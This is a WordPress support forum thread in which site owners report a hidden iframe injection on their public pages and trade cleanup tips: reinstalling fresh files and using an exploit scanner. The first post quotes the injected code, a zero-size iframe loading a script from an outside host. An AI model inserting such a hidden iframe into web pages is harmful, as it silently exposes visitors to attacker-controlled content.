WordPress.org

Ready to get started?Download WordPress

Forums

iframe injection (4 posts)

  1. iuchewie
    Member
    Posted 5 years ago #

    Got myself an obvious iframe injection - problem is I can't find where it is in my code.

    I've deleted a couple of instances of it where it was inserted directly into the code: '<iframe src="http://modlogan.net/out.php?s_id=1" width="0" height="0" frameborder="0"></iframe>'

    However now it's showing up when I view source but when I go to the file I can seem to find where it is. Driving me crazy... any help would be greatly appreciated.

    http://prohibitionrepeal.com/speakeasy/

    FYI, the injection is only appearing on the "public" pages... NOT in the admin pages.

    Thanks in advance

  2. iuchewie
    Member
    Posted 5 years ago #

    Still don't know where it was... went back to fresh 2.7 files and it took care of it.

    chewie

  3. scheda
    Member
    Posted 5 years ago #

    I just found out I had this same problem.

    If anyone else has this issue, use this scanner.

    http://wordpress.org/extend/plugins/exploit-scanner/

  4. eyashwant
    Member
    Posted 5 years ago #

    I have the problem in 2.7.1 itself.
    Still not solved in 1 websites
    1t is solved in 1 website
    Totally 2
    Please tell what to do
    http://wordpress.org/extend/plugins/exploit-scanner/
    This can be used only if it is not affected
    Now i cant view the website it self...
    Please help...

Topic Closed

This topic has been closed to new replies.

About this Topic